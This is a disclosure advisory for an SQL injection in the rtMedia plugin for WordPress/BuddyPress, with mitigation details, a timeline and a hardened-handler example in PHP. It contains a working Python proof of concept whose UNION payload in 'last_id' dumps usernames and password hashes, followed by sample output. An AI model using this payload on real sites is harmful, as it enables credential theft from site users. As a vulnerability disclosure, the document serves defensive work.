rtMedia for WordPress, BuddyPress and bbPress 3.7.39, SQL Injection

When initialized, rtMedia includes and instantiates certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained in the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php’, line 110, if the class ‘BuddyPress’ is available. Once instantiated, the RTMediaActivityUpgrade class registers an AJAX action called ‘rtmedia_activity_upgrade’. This AJAX method is callable by any registered user, and is susceptible to MySQL injection through its ‘last_id’ parameter, as shown in the proof of concept below.
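To show the class of defect described above from the defender's side, the following is an added, illustrative sketch (not rtMedia's own code) of an AJAX handler that interpolates ‘last_id’ straight into SQL, beside a hardened form that uses $wpdb->prepare() with an integer placeholder and restricts the action to administrators. The table name rt_rtm_media and the id column are assumptions taken from the injected query in the PoC; the nonce action name is also assumed.

```php
<?php
// Added illustrative example, not code from the rtMedia plugin.
// Table and column names are assumed from the PoC's injected query.

// VULNERABLE pattern: the request value becomes part of the SQL text, so a
// value such as "0 AND 1=0 ... UNION ALL SELECT ..." is executed as SQL.
function example_vuln_activity_upgrade() {
    global $wpdb;
    $last_id = isset( $_POST['last_id'] ) ? $_POST['last_id'] : 0;
    $table   = $wpdb->prefix . 'rt_rtm_media';
    $rows    = $wpdb->get_results(
        "SELECT * FROM {$table} WHERE id > {$last_id} LIMIT 100"
    );
    wp_send_json( array( 'activity_id' => $rows ) );
}

// HARDENED form: verify a nonce, require an administrative capability
// (an upgrade routine is not something every registered user should run),
// coerce the value to a non-negative integer, and bind it via prepare().
function example_safe_activity_upgrade() {
    global $wpdb;
    check_ajax_referer( 'rtmedia_activity_upgrade', 'nonce' ); // assumed nonce action
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }
    $last_id = isset( $_POST['last_id'] ) ? absint( $_POST['last_id'] ) : 0;
    $table   = $wpdb->prefix . 'rt_rtm_media';
    $rows    = $wpdb->get_results(
        $wpdb->prepare( "SELECT * FROM {$table} WHERE id > %d LIMIT 100", $last_id )
    );
    wp_send_json( array( 'activity_id' => $rows ) );
}
add_action( 'wp_ajax_rtmedia_activity_upgrade', 'example_safe_activity_upgrade' );
```

With the hardened handler, the PoC's ‘last_id’ value collapses to the integer 0 and the UNION never reaches MySQL; logging requests to admin-ajax.php whose action is rtmedia_activity_upgrade and whose last_id is non-numeric is a simple detection for attempts against unpatched installs.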

Homepage

https://wordpress.org/plugins/buddypress-media/

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Attack Scope

remote

Authorization Required

Registered

Mitigation

Update to version 3.7.40.

Proof of Concept

The PoC below logs in as the user ‘test’ and then triggers the MySQL injection, which returns a list of usernames and hashed passwords.

import requests, json

s = requests.session()
target = 'http://localhost'

# Step 1: authenticate as a registered (non-privileged) user.
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the rtmedia_activity_upgrade AJAX action with an injected last_id.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "rtmedia_activity_upgrade",
    "last_id": "0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

# The injected result is returned in the 'activity_id' field of the JSON response.
print(json.loads(r.text)['activity_id'])

Output

~$ python g0blin-00046.py

test:$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0

Timeline

  • 2015-04-21: Discovered
  • 2015-04-21: Vendor notified
  • 2015-04-21: Version 3.7.40 released – issue resolved
  • 2015-04-28: Advisory released